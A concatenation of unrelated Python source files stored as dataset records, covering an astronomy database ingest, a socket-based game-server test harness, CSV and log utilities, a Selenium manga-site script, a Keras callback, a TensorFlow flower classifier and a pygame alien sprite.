n_sources != len(telescope) or n_sources != len(bands):\n raise RuntimeError(\"All lists should be same length\")\n\n for i, source in enumerate(sources):\n db_name = db.search_object(source, output_table='Sources')[0]['source']\n\n # Construct data to be added\n photometry_data = [{'source': db_name,\n 'band': bands[i],\n 'ucd': ucds[i],\n 'magnitude': magnitudes[i],\n 'magnitude_error': magnitude_errors[i],\n 'telescope': telescope[i],\n 'instrument': instrument[i],\n 'epoch': epoch,\n 'comments': comments,\n 'reference': reference[i]}]\n verboseprint('Photometry data: ', photometry_data, verbose=verbose)\n\n try:\n db.Photometry.insert().execute(photometry_data)\n n_added += 1\n except sqlalchemy.exc.IntegrityError:\n raise SimpleError(\"The source may not exist in Sources table.\\n\"\n \"The reference may not exist in the Publications table. \"\n \"Add it with add_publication function. 
\\n\"\n \"The measurement may be a duplicate.\")\n\n print(\"Photometry measurements added to database: \", n_added)\n\n return\n\n\ndef find_in_simbad(sources, desig_prefix, source_id_index = None, verbose = False):\n \"\"\"\n Function to extract source designations from SIMBAD\n\n Parameters\n ----------\n sources\n desig_prefix\n source_id_index\n verbose\n\n Returns\n -------\n Astropy table\n\n \"\"\"\n\n n_sources = len(sources)\n\n Simbad.reset_votable_fields()\n Simbad.add_votable_fields('typed_id') # keep search term in result table\n Simbad.add_votable_fields('ids') # add all SIMBAD identifiers as an output column\n print(\"simbad query started\")\n result_table = Simbad.query_objects(sources)\n print(\"simbad query ended\")\n\n ind = result_table['SCRIPT_NUMBER_ID'] > 0 # find indexes which contain results\n\n simbad_ids = result_table['TYPED_ID', 'IDS'][ind] # .topandas()\n\n db_names = []\n simbad_designations = []\n if source_id_index is not None:\n source_ids = []\n\n for row in simbad_ids:\n db_name = row['TYPED_ID']\n ids = row['IDS'].split('|')\n designation = [i for i in ids if desig_prefix in i]\n\n if designation:\n verboseprint(db_name, designation[0])\n db_names.append(db_name)\n simbad_designations.append(designation[0])\n if source_id_index is not None:\n source_id = designation[0].split()[source_id_index]\n source_ids.append(int(source_id)) #convert to int since long in Gaia\n\n n_matches = len(db_names)\n print('Found', n_matches, desig_prefix, ' sources for', n_sources, ' sources')\n\n result_table = Table([db_names, simbad_designations, source_ids],\n names=('db_names', 'designation', 'source_id'))\n\n return result_table","sub_path":"scripts/ingests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":40833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"203197677","text":"#coding=utf8\n\n'''\n@author: chengjie\n'''\n \nimport threading\nimport Queue\nimport select\nimport robot_Actions\nfrom robot.api import logger\nimport struct\nimport LGN\n# 配合robotframework 改用其自带的logger输出,使用logging时,会出现意外的配置文件无法找到的情况。必须要写完整路径才可以使用,比较麻烦\n#import logging\n#import logging.config\n#logging.config.fileConfig(\"logging.config\")\n#logger = logging.getLogger(\"simpleExample\")\nimport copy\nimport time\nregisterSocks = {}\nbg_thread_flag = True\nmax_robots = 1\nbg_thread_lock = threading.Lock()\nregisterSocks_Queue = Queue.Queue()\nUNregisterSocks_Queue = Queue.Queue()\n\ndef registerManager():\n \"\"\"\n # 注册管理机\n # 当有外部的机器人,需要注册收包的sock时,需要将自己的sock通过注册管道传递到这里,添加到可使用的字典内。\n \"\"\"\n global bg_thread_lock, bg_thread_flag, registerSocks, registerSocks_Queue, UNregisterSocks_Queue\n \n while bg_thread_flag:\n bg_thread_lock.acquire()\n \"\"\"\n # 处理传入sock,注册到数据字典内\n # 这里的原子操作为:获取机器人客户端传入的待操作sock,并且,建立一个对应的数据书写管道,将管道的对象发送回客户端\n \"\"\"\n if not registerSocks_Queue.empty():\n newRegister_sock = registerSocks_Queue.get()\n logger.info(\"get sock [%s] registered.\" % newRegister_sock)\n registerSocks[newRegister_sock] = Queue.Queue()\n bg_thread_lock.release()\n \n \"\"\"\n # 处理传入sock,从数据字典内删除\n \"\"\"\n bg_thread_lock.acquire()\n if not UNregisterSocks_Queue.empty():\n delRegister_sock = UNregisterSocks_Queue.get()\n logger.info(\"get sock [%s] unregistered.\" % newRegister_sock)\n del registerSocks[delRegister_sock]\n bg_thread_lock.release() \n \n logger.info(\"registerManager exited\")\n \ndef recvManager():\n \n \"\"\"\n # 收包管理机\n \"\"\"\n global bg_thread_lock, bg_thread_flag, registerSocks\n \n 
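# A selectWaitTime of 0.0 makes the select.select() call below return immediately (non-blocking), so this loop busy-polls the registered sockets.\n 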
selectWaitTime = 0.0 \n sd = {}\n recvable = []\n def returnBroken(o = False, p = \"\", b = \"\", h = []):\n return {\"ok\": o, \"packet\": p, \"BrokenPacket\": b, \"header\":[]}\n \n def recvData(sock, data):\n MINSocketHeaderLength = 16\n SocketHeaderProtocol = \">iiii\"\n packet, BrokenPacket = data[\"packet\"], data[\"BrokenPacket\"]\n # Merge in any leftover partial packet from the previous read\n if len(BrokenPacket):\n packet += BrokenPacket\n BrokenPacket = \"\"\n try:\n packet += sock.recv(1024)\n # If the received/merged packet is empty, return the empty result structure\n if not len(packet):\n return returnBroken()\n except:\n return returnBroken(b = packet)\n \n if len(packet) < MINSocketHeaderLength:# must be at least 16 bytes, i.e. contain at least the minimal header\n return returnBroken(b = packet)\n # Unpack the packet header\n PackHeader, PackBody = packet[:MINSocketHeaderLength], packet[MINSocketHeaderLength:]\n try:\n tag, packetLength, systemID, protoID = struct.unpack(SocketHeaderProtocol, PackHeader)\n header = tag, packetLength, systemID, protoID\n packetLength -= MINSocketHeaderLength\n if packetLength <= 0:\n return returnBroken(b = packet)\n except:\n return returnBroken(b = packet)\n \n # Examine the packet body\n if packetLength == len(PackBody):\n #logger.info(\"PACKAGEINFO : package length is %s -- received data length is -- %s\" % (packetLength, len(packet)))\n return returnBroken(o = True, p = packet, h = header)\n elif packetLength < len(PackBody):\n PackData, BrokenPacket = PackBody[:packetLength], PackBody[packetLength:] \n packet = PackHeader + PackData\n #logger.info(\"PACKAGEINFO : package is larger than definition, length is %s -- received data length is -- %s\" % (packetLength, len(packet)))\n return returnBroken(o = True, p = packet, b = BrokenPacket, h = header)\n elif packetLength > len(PackBody):\n #logger.info(\"PACKAGEINFO : package is smaller than definition, length is %s -- received data length is -- %s\" % (packetLength,len(PackBody)))\n return returnBroken(b = packet, h = header)\n \n \n while bg_thread_flag:\n \"\"\"bg_thread_lock.acquire()\n \"\"\"\n # Clean up socks that no longer exist\n \"\"\"\n for ns in registerSocks.keys():\n try:\n ns.fileno()\n except:\n logger.info(\"sock [%s] not exists, delete it from registerSocks_Queue.\" % ns)\n del registerSocks[ns]\n bg_thread_lock.release()\n \"\"\"\n if not len(registerSocks):# if empty, go back and wait for new data\n continue\n \n recvable , sendable , exceptional = select.select(registerSocks.keys(), [], [], selectWaitTime)\n \n if len(recvable):\n for sock in recvable:\n bg_thread_lock.acquire()\n if sock not in sd:\n logger.info(\"sock [%s] initialized\" % sock)\n sd[sock] = {\"ok\": False, \"packet\":\"\", \"BrokenPacket\": \"\", \"header\":[]}# initialize the per-sock data structure\n \n #logger.info(\"sock [%s] receiving data.\" % sock)\n sd[sock] = recvData(sock, sd[sock])\n bg_thread_lock.release()\n \n if sd[sock][\"ok\"]:\n bg_thread_lock.acquire()\n #logger.info(sd[sock][\"ok\"])\n #logger.info(\"data is ready. 
sock [%s] \" % sock)\n #logger.info(\"data is [%s]\" % repr(sd[sock]))\n \n sockdata = copy.deepcopy(sd[sock])\n registerSocks[sock].put(sockdata)\n \n #logger.info(\"data is [%s]\" % repr(sockdata))\n sd[sock][\"packet\"] = \"\"\n sd[sock][\"ok\"] = False\n bg_thread_lock.release()\n logger.info(\"manager thread exited.\")\n\ndef robotCheck(robots):\n global bg_thread_flag\n while bg_thread_flag:\n if len([robot for robot in robots if robot.isAlive()]) == 0:\n bg_thread_flag = False\n logger.info(\"all robots exited.\")\n\n\ndef StartRobot(Host, Port):\n global bg_thread_lock, bg_thread_flag, registerSocks_Queue, UNregisterSocks_Queue\n sock = robot_Actions.ConnectHandler(Host, Port)\n logger.info(LGN.Action_Msg_04 % sock)\n bg_thread_lock.acquire()\n registerSocks_Queue.put(sock)\n bg_thread_lock.release()\n return sock\n\n\ndef robotManager():\n \n global max_robots#bg_thread_lock, bg_thread_flag, registerSocks_Queue, UNregisterSocks_Queue\n \n nt_registerManager = threading.Thread(target = registerManager)\n nt_registerManager.start()\n nt_recvManager = threading.Thread(target = recvManager)\n nt_recvManager.start()\n #nt_registerManager.join()\n #nt_recvManager.join()\n \"\"\"\n #tt = []\n #from multiprocessing.dummy import Pool as ThreadPool\n logger.info(\"started\")\n import threadpool\n pool = threadpool.ThreadPool(2)\n reqs = threadpool.makeRequests(robotworker, [])\n [ pool.putRequest(req) for req in reqs ]\n pool.wait()\n \nclass robotworker(object):\n global bg_thread_lock, bg_thread_flag, registerSocks_Queue, UNregisterSocks_Queue, max_robots\n \n def __init__(self):\n \n #self.sock = ConnectHandler(\"120.25.152.35\", 8091)\n self.sock = ConnectHandler(\"192.168.1.119\", 8091)\n logger.info(\"robot started. sock [%s]\" % self.sock)\n bg_thread_lock.acquire()\n registerSocks_Queue.put(self.sock)\n \n \n bg_thread_lock.release()\n \n st = time.time()\n self.sock.send(encrypt_LaunchRequest_Pack(protobuf = (1, 2, 1), account = str(max_robots + 1), password =\"121234561233\", device=\"1236578557321\" ))\n while 1:\n if registerSocks.has_key(self.sock) and not registerSocks[self.sock].empty():\n data = registerSocks[self.sock].get()\n #logger.info(registerSocks[self.sock].empty())\n #logger.info(data)\n cryptdata = decrypt_LaunchRequest_Pack(data[\"packet\"])\n logger.info(time.time() - st)\n UNregisterSocks_Queue.put(self.sock)\n break\"\"\"\n\n\n ","sub_path":"rf_test_lib/robot_main.py","file_name":"robot_main.py","file_ext":"py","file_size_in_byte":8580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297378913","text":"# coding:utf-8\n\nimport csv\nfrom collections import OrderedDict\n\n\ndef install_patch():\n csv.DictWriter = DictManager\n\n\nclass DictManager:\n \"\"\" 按照指定顺序写入csv文件\n 1. -> DictManager(open(\"test.scv\", \"wb\"), keys=OrderedDict([(\"id\", \"ID\"),(\"url\", \"链接地址\"),])\n ).writeheader().writerows([{},{},....])\n 2. 
-> DictManager(open(\"test.scv\", \"wb\"),\n keys=[\"id\", \"flower\", \"url\", \"online\"],\n headers=[\"ID\", \"其他\", \"直播地址\", \"在线人数\"]\n ).writerows([{},{},....])\n \"\"\"\n\n def __init__(self, file, keys, headers=(), dialect=\"excel\", *args, **kwargs):\n self.keys, self.headers = keys, headers\n if isinstance(keys, OrderedDict):\n self.keys, self.headers = zip(*[(key, value) for key, value in keys.iteritems()])\n self.writer = csv.writer(file, dialect, *args, **kwargs)\n\n def writeheader(self, headers=()):\n return self.writer.writerow(headers or self.headers) or self\n\n def writerow(self, rowdict):\n return self.writer.writerow([rowdict[key] for key in self.keys]) or self\n\n def writerows(self, rowlist):\n return map(self.writerow, rowlist) or self\n\n\nif __name__ == '__main__':\n result = {\n \"2218262\": {\n \"flower\": \"90200\",\n \"url\": \"http://www.tuho.tv/2218262\",\n \"nick\": \"2030丶♚千♞足♚\",\n \"fans\": \"291粉丝\",\n \"intro\": \"不把我怼爽,你特么的滚远点。。。\",\n \"online\": \"1605人在看\",\n \"id\": 2218262\n },\n \"3016952\": {\n \"flower\": \"92750\",\n \"url\": \"http://www.tuho.tv/3016952\",\n \"nick\": \"✨自⭐己✨\",\n \"fans\": \"224粉丝\",\n \"intro\": \"陪你聊聊天,为你唱首歌,我的驿站等你来做客~\",\n \"online\": \"1602人在看\",\n \"id\": 3016952\n },\n \"4963215\": {\n \"flower\": \"104201\",\n \"url\": \"http://www.tuho.tv/4963215\",\n \"nick\": \"甜心小公主\",\n \"fans\": \"5011粉丝\",\n \"intro\": \"直播时间下午一点,晚上九点,风里雨里直播间等你😚\",\n \"online\": \"2373人在看\",\n \"id\": 4963215\n },\n \"6360024\": {\n \"flower\": \"63901\",\n \"url\": \"http://www.tuho.tv/6360024\",\n \"nick\": \"柠檬味的芋头\",\n \"fans\": \"287粉丝\",\n \"intro\": \"来看主播不后悔😘\",\n \"online\": \"1601人在看\",\n \"id\": 6360024\n },\n \"6792870\": {\n \"flower\": \"9400\",\n \"url\": \"http://www.tuho.tv/6792870\",\n \"nick\": \"a怀中猫\",\n \"fans\": \"607粉丝\",\n \"intro\": \"游泳馆\",\n \"online\": \"1264人在看\",\n \"id\": 6792870\n },\n \"6802918\": {\n \"flower\": \"8700\",\n \"url\": \"http://www.tuho.tv/6802918\",\n \"nick\": \"既然青春留不住(1105)\",\n \"fans\": \"326粉丝\",\n \"intro\": \"因为有了你们,人生才变的如此精彩!感谢你们的陪伴!么么哒\",\n \"online\": \"828人在看\",\n \"id\": 6802918\n },\n \"6982094\": {\n \"flower\": \"0\",\n \"url\": \"http://www.tuho.tv/6982094\",\n \"nick\": \"阿孜古丽苏姆\",\n \"fans\": \"0粉丝\",\n \"intro\": \"聊天可否\",\n \"online\": \"204人在看\",\n \"id\": 6982094\n }\n }\n\n DictManager(open(\"test.scv\", \"wb\"), keys=OrderedDict(\n [(\"id\", \"ID\"), (\"url\", \"链接地址\"), ])\n ).writeheader().writerows(result.itervalues())\n","sub_path":"utils/csv_dict.py","file_name":"csv_dict.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"386915925","text":"# -*- coding:utf-8 -*-\n'''\nCreated on Jul 19, 2012\n\n@author: zst\n'''\nimport time,os\nfrom com.zctt.iaap.paf.pafsys import systemProperties,geti18nString,timeout\nfrom xml.etree.ElementTree import ElementTree\nfrom com.zctt.iaap.paf.core.datasetdef import OPResult\nfrom com.zctt.iaap.paf.core.errcode import CommonError,CommonDBError\n\n\nclass PrivacyPolicyConfig:\n '''隐私策略配置实体类\n name:(string)字段名称,\n mark:(string)字段策略隐藏符,\n start:(int)隐藏字符的起始位置,\n end:(int)隐藏字符的结束位置,\n caption:(string) 字段中文名称\n '''\n def __init__(self,name,mark,start,end,caption):\n self.name=name\n self.mark=mark\n self.start=int(start)\n self.end=int(end)\n self.caption=caption\n \ndef checkoutItem(checkoutItems,args):\n try:\n id = args[0]\n uid = args[1]\n #如果已经迁出,需要查看是不是自己迁出的\n if checkoutItems.has_key(id):\n #不是自己迁出,看操作是否超时\n if checkoutItems[id]['uid'] 
!= uid:\n # after a timeout the item may be checked out again\n nowTime = time.time()\n if nowTime - checkoutItems[id]['time'] > timeout:\n checkoutItems[id] = {'time':time.time(), 'uid':uid}\n return OPResult(None,CommonError.NO_ERROR,None)\n else:\n return OPResult(None,CommonDBError.DataAlreadyCheckedout,geti18nString('element has already been checked out'))\n else:# checked out by this user: refresh the checkout info\n checkoutItems[id] = {'time':time.time(), 'uid':uid}\n return OPResult(None,CommonError.NO_ERROR,None)\n else:\n checkoutItems[id] = {'time':time.time(), 'uid':uid}\n return OPResult(None,CommonError.NO_ERROR,None)\n except Exception as e:\n return OPResult(None,CommonDBError.UnknownException,str(e))\n \ndef checkinItem(checkoutItems,args):\n '''\n Release the edit lock on an item\n '''\n try:\n id = args[0]\n checkoutItems.pop(id, None)\n return OPResult(None,CommonError.NO_ERROR,None)\n except Exception as e:\n return OPResult(None,CommonDBError.UnknownException,str(e))\n\ndef clearOutTimeCheckOutItem(checkoutItems):\n '''\n Remove checked-out items that have timed out\n '''\n if len(checkoutItems.items())==0:\n return\n nowTime = time.time()\n # iterate over a snapshot of the keys, since entries are removed inside the loop\n for key in list(checkoutItems.keys()):\n if nowTime - checkoutItems[key]['time'] > timeout:\n checkoutItems.pop(key, None)\n \ndef executeSqlOperation(dbConn, sql):\n isSuccess = False\n if dbConn:\n affectedRowCount = dbConn.executeNoQuery(sql)\n if affectedRowCount >= 0: isSuccess = True\n return isSuccess \ndef isExistedItem(sql,dbConn):\n ''' Check whether the item already exists '''\n isExisted = False\n records = dbConn.executeQuery(sql)\n if records and records[0][0] is not None:\n if int(records[0][0]) > 0:\n isExisted = True\n return isExisted \ndef commitOrRollback(isSuccess,dbConn):\n ''' Commit on success, otherwise roll back '''\n errCode = OPResult(None,CommonError.NO_ERROR,None)\n if isSuccess:\n dbConn.commit()\n else:\n errCode = OPResult(None,CommonError.DBErr,None)\n dbConn.rollback()\n dbConn.close()\n return errCode\ndef parsePrivacyPolicyConfig(privacyPolicyFields):\n ''' Parse the privacy policy configuration '''\n tree = ElementTree()\n xmlFields = tree.parse(os.path.join(systemProperties['ConfigFilePath'],'systemmanager/PrivacyPolicyConfig.xml'))\n# xmlFields=tree.parse('/home/zst/works/IAAP/src/Config/systemmanager/PrivacyPolicyConfig.xml')\n for xml in xmlFields:\n name,mark,start,end,caption=xml.findtext('Name'),xml.findtext('Mark'),xml.findtext('Start'),xml.findtext('End'),xml.findtext('Caption')\n privacyPolicy=PrivacyPolicyConfig(name,mark,start,end,caption)\n privacyPolicyFields[name]=privacyPolicy\n \nif __name__=='__main__':\n parsePrivacyPolicyConfig({})\n \n \n \n \n ","sub_path":"service/com/zctt/iaap/services/systemmanager/systemManageUtils.py","file_name":"systemManageUtils.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"94782410","text":"from selenium import webdriver\r\nfrom time import sleep\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.actions import mouse_button\r\nfrom selenium.webdriver.common.by import 
By\r\nimport selenium.common.exceptions\r\nimport pyautogui\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as ec\r\n\r\n\r\nbrowser = webdriver.Chrome()\r\nbrowser.maximize_window()\r\nwait = WebDriverWait(browser, 10)\r\n# sleep(1)\r\nbrowser.get(\"http://mangahere.win/\")\r\n# sleep(1)\r\n# advertisment_cancle_button = browser.find_element_by_xpath(\"//*[@id='AdskeeperC992642Popup-close-btn']/img\")\r\n# ads = advertisment_cancle_button.is_displayed()\r\n\"\"\"\r\nif ads == true :\r\n advertisment_cancle_button.click()\r\n print('advertiserment is removed good to go ....!!')\r\n\"\"\"\r\nsearch_box = browser.find_element_by_class_name(\"searchi\")\r\n\r\nsearch_box.send_keys(\"Kanojo\")\r\nsleep(2)\r\nkanojo_okarishimasu =browser.find_element_by_xpath(\"//*[@id='3585']/div\")\r\n\r\nprint(f'kanojo button is appeared : ' + str(kanojo_okarishimasu.is_displayed()))\r\n\r\nprint(f'kanojo button is enabled : ' + str(kanojo_okarishimasu.is_enabled()))\r\nkanojo_okarishimasu.click()\r\n\r\nchart_list = browser.find_element(By.XPATH, \"//*[@id='chapter']/div/div[2]/div[1]/span[1]/a\")\r\n\r\nprint(f'if chart list is appeared : '+ str(chart_list.is_displayed()))\r\nprint(f'chart list button is enabled : ' + str(chart_list.is_enabled()))\r\n# if yeah == \"true\":\r\nchart_list.click()\r\n\r\ntry:\r\n wait.until(ec.element_to_be_clickable(\r\n browser.find_element_by_xpath(\"//*[@id='AdskeeperC992642Popup-close-btn']/img\")))\r\n ads_cut_button = browser.find_element_by_xpath(\"//*[@id='AdskeeperC992642Popup-close-btn']/img\")\r\n print(f'ads button is appeared : ' + str(ads_cut_button.is_displayed()))\r\n print(f'ads button is enabled : '+ str(ads_cut_button.is_enabled()))\r\n ads_cut_button.click()\r\nexcept Exception as e:\r\n print(e)\r\n\r\n","sub_path":"AUTO/kanojo check .py","file_name":"kanojo check .py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"1759126","text":"import csv\n\n\nclass CsvFile:\n def __init__(self, simtime=0, latitude=0, longitude=0, sog=0, cog=0, heading=0, aftthruster=0, forethruster=0,\n portengine=0, stbdengine=0, portrudder=0, stbdrudder=0, iceload=0):\n self.simtime = simtime\n self.latitude = latitude\n self.longitude = longitude\n self.sog = sog\n self.cog = cog\n self.heading = heading\n self.aftthruster = aftthruster\n self.forethruster = forethruster\n self.portengine = portengine\n self.stbdengine = stbdengine\n self.portrudder = portrudder\n self.stbdrudder = stbdrudder\n self.iceload = iceload\n \n## Populate a CsvFile from the contents of a Python dictionary (dict) \n @classmethod\n def fromDict(cls, dict):\n return cls(dict[\"SimTime\"],\n abs(dict[\"Lat\"]), abs(dict[\"Long\"]),\n dict[\"SOG\"], dict[\"COG\"],dict[\"Heading\"],\n dict[\"Aft\"], dict[\"Fore\"],\n dict[\"PortE\"], dict[\"StbdE\"],\n dict[\"PortR\"], dict[\"StbdR\"],\n dict[\"IceLoad\"])\n\nclass CsvRowsOperator:\n def __init__(self):\n self.log_objects = []\n\n def read_file(self, filename):\n csv_reader = csv.reader(filename, delimiter=',', quotechar='|')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n line_count += 1\n continue\n else:\n self.log_objects.append(\n CsvFile(float(row[0]), float(row[1]), abs(float(row[2])), float(row[3]), float(row[4]),\n float(row[5]),\n float(row[6]), float(row[7]), float(row[8]), float(row[9]), float(row[10]),\n float(row[11])))\n line_count += 1\n return 
self.log_objects\n","sub_path":"log_file.py","file_name":"log_file.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"78988508","text":"class ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n \n if head == None or head.next == None:\n return head\n \n equisita = self.reverseList(head.next) \n head.next.next = head\n head.next = None\n return equisita\n\nn1 = ListNode(1)\nn2 = ListNode(2)\nn3 = ListNode(3)\nn4 = ListNode(4)\nn5 = ListNode(5)\n\nn1.next = n2\nn2.next = n3\nn3.next = n4\nn4.next = n5\n\ntestcase = n1\nmysol = Solution() \nprint(mysol.reverseList(n1))\n ","sub_path":"204_ReverseLinkedList/1stApproach.py","file_name":"1stApproach.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"549593266","text":"from typing import Dict\nfrom sanitize_ml_labels import sanitize_ml_labels\nfrom .notipy_me import Notipy\n\ntry:\n from tensorflow.keras.callbacks import Callback\nexcept ModuleNotFoundError:\n pass\nelse:\n class KerasNotipy(Callback):\n\n def __init__(\n self,\n task_name: str = None,\n metadata: Dict = None,\n report_only_validation: bool = True,\n sanitize_metrics: bool = True\n ):\n \"\"\"Create new Keras Notipy object.\n\n Parameters\n -----------------\n task_name: str = None,\n Optional name of the task to use for report.\n metadata: Dict = None,\n Optional metadata to be reported alongside data.\n report_only_validation: bool = True,\n Report only metrics relative to the validation set.\n If the log only contains metrics relative to the training,\n this limitation is automatically lifted.\n sanitize_metrics: bool = True,\n Sanitize the names of the metrics.\n \"\"\"\n super().__init__()\n self._metadata = {} if metadata is None else metadata\n self._notipy = Notipy(task_name=task_name)\n self._report_only_validation = report_only_validation\n self._sanitize_metrics = sanitize_metrics\n\n def on_train_begin(self, logs=None):\n \"\"\"Start notipy as the training begins.\"\"\"\n self._notipy.enter()\n\n def on_epoch_end(self, epoch: int, logs=None):\n \"\"\"When the epoch ends we report how the model is doing.\"\"\"\n if logs is not None:\n log_has_validation = any(\n metric.startswith(\"val\")\n for metric in logs\n )\n self._notipy.add_report({\n **self._metadata,\n **{\n sanitize_ml_labels(metric) if self._sanitize_metrics else metric: value\n for metric, value in logs.items()\n if not self._report_only_validation or metric.startswith(\"val\") or not log_has_validation\n },\n \"epoch\": epoch\n })\n\n def on_train_end(self, logs=None):\n \"\"\"When the training is complete we close down also the Notipy.\"\"\"\n self._notipy.exit()\n","sub_path":"notipy_me/keras_notipy.py","file_name":"keras_notipy.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"333859772","text":"from skimage import io,transform\nimport glob\nimport os\nimport numpy as np\nimport tensorflow as tf\npath=\"F:/datas/flower_photos/\"\nmodel_path=\"model.ckpt\"\n\nw=100\nh=100\nc=3\n\ndef read_img(path):\n cate=[path+x for x in os.listdir(path) if os.path.isdir(path+x)]\n imgs=[]\n labels=[]\n for idx,folder in enumerate(cate):\n for im in glob.glob(folder+'/*.jpg'):\n print(\"reading images:%s\"%(im))\n img=io.imread(im)\n 
img=transform.resize(img,(w,h))\n imgs.append(img)\n labels.append(idx)\n    return np.asarray(imgs,np.float32),np.asarray(labels,np.int32)\n\ndef model(input_tensor,train,regularizer):\n    with tf.variable_scope(\"layer1-conv1\"):\n        conv1_weights=tf.get_variable(\"weight\",[5,5,3,32],initializer=tf.truncated_normal_initializer(stddev=0.1))\n        conv1_biases=tf.get_variable(\"bias\",[32],initializer=tf.constant_initializer(0.0))\n        conv1=tf.nn.conv2d(input_tensor,conv1_weights,strides=[1,1,1,1],padding=\"SAME\")\n        relu1=tf.nn.relu(tf.nn.bias_add(conv1,conv1_biases))\n    with tf.name_scope(\"layer1-pool1\"):\n        pool1=tf.nn.max_pool(relu1,ksize=[1,2,2,1],strides=[1,2,2,1],padding=\"VALID\")\n    with tf.variable_scope(\"layer3-conv2\"):\n        conv2_weights=tf.get_variable(\"weight\",[5,5,32,64],initializer=tf.truncated_normal_initializer(stddev=0.1))\n        conv2_biases = tf.get_variable(\"bias\", [64], initializer=tf.constant_initializer(0.0))\n        conv2 = tf.nn.conv2d(pool1, conv2_weights, strides=[1, 1, 1, 1], padding=\"SAME\")\n        relu2 = tf.nn.relu(tf.nn.bias_add(conv2, conv2_biases))\n    with tf.name_scope(\"layer4-pool2\"):\n        pool2=tf.nn.max_pool(relu2,ksize=[1,2,2,1],strides=[1,2,2,1],padding=\"VALID\")\n    # s=np.int(num_example*ratio)\n    with tf.variable_scope(\"layer5-conv3\"):\n        conv3_weights = tf.get_variable(\"weight\", [3, 3, 64, 128],\n                                        initializer=tf.truncated_normal_initializer(stddev=0.1))\n        conv3_biases = tf.get_variable(\"bias\", [128], initializer=tf.constant_initializer(0.0))\n        conv3 = tf.nn.conv2d(pool2, conv3_weights, strides=[1, 1, 1, 1], padding=\"SAME\")\n        relu3 = tf.nn.relu(tf.nn.bias_add(conv3, conv3_biases))\n    with tf.name_scope(\"layer6-pool3\"):\n        pool3 = tf.nn.max_pool(relu3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"VALID\")\n\n    with tf.variable_scope(\"layer7-conv4\"):\n        conv4_weights = tf.get_variable(\"weight\", [3, 3, 128, 128],\n                                        initializer=tf.truncated_normal_initializer(stddev=0.1))\n        conv4_biases = tf.get_variable(\"bias\", [128], initializer=tf.constant_initializer(0.0))\n        conv4 = tf.nn.conv2d(pool3, conv4_weights, strides=[1, 1, 1, 1], padding=\"SAME\")\n        relu4 = tf.nn.relu(tf.nn.bias_add(conv4, conv4_biases))\n    with tf.name_scope(\"layer8-pool4\"):\n        pool4 = tf.nn.max_pool(relu4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"VALID\")\n    nodes=6*6*128\n    reshaped=tf.reshape(pool4,[-1,nodes])\n    print(\"shape of reshaped:\",reshaped.shape)\n\n\n    with tf.variable_scope(\"layer9-fc1\"):\n        fc1_weights=tf.get_variable(\"weight\",[nodes,1024],initializer=tf.truncated_normal_initializer(stddev=0.1))\n        if regularizer!=None:\n            tf.add_to_collection(\"losses\",regularizer(fc1_weights))\n        fc1_biases=tf.get_variable(\"baise\",[1024],initializer=tf.constant_initializer(0.1))\n        fc1=tf.nn.relu(tf.matmul(reshaped,fc1_weights)+fc1_biases)\n        if train:\n            fc1=tf.nn.dropout(fc1,0.5)\n\n    with tf.variable_scope(\"layer10-fc2\"):\n        fc2_weights=tf.get_variable(\"weight\",[1024,512],initializer=tf.truncated_normal_initializer(stddev=0.1))\n        if regularizer!=None:\n            tf.add_to_collection(\"losses\",regularizer(fc2_weights))\n        fc2_biases=tf.get_variable(\"baise\",[512],initializer=tf.constant_initializer(0.1))\n        fc2=tf.nn.relu(tf.matmul(fc1,fc2_weights)+fc2_biases)\n        if train:\n            fc2=tf.nn.dropout(fc2,0.5)\n\n\n    with tf.variable_scope(\"layer11-fc3\"):\n        fc3_weights=tf.get_variable(\"weight\",[512,5],initializer=tf.truncated_normal_initializer(stddev=0.1))\n        if regularizer!=None:\n            tf.add_to_collection(\"losses\",regularizer(fc3_weights))\n 
fc3_biases=tf.get_variable(\"baise\",[5],initializer=tf.constant_initializer(0.1))\n logit=tf.matmul(fc2,fc3_weights)+fc3_biases\n return logit\n\n\n","sub_path":"ML_learning/flower_class.py","file_name":"flower_class.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"410565279","text":"'''\nCreated on Apr 28, 2015\n\n@author: saul\n\nAlien base class, for standard behavior\nsubclasses for varied behavior\n'''\nimport pygame\nfrom item import Item\nfrom bullet import AlienBullet\nfrom math import cos,sin, pi\nimport random\n\nclass Alien(Item):\n \n def __init__(self, x, y, maxy):\n super().__init__(x, y)\n self.image = pygame.image.load(\"./res/a1.png\").convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.maxy = maxy\n self.amp = 30\n self.speed= 1\n self.power = 5\n self.attack = 100\n self.aCount = random.randint(0, self.attack)\n self.angle = 30\n \n def tryFire(self):\n# if self.rect.y < 0: return False #no shooting till on screen\n return self.aCount >= self.attack\n \n def fire(self):\n self.aCount = 0\n \n return AlienBullet(self.getCenter()[0]-25, self.getCenter()[1])\n \n \n def update(self):\n if not self.explode:\n self.vx = self.amp // self.speed * cos((self.aCount- self.attack//2)/pi)\n self.vy = self.speed\n 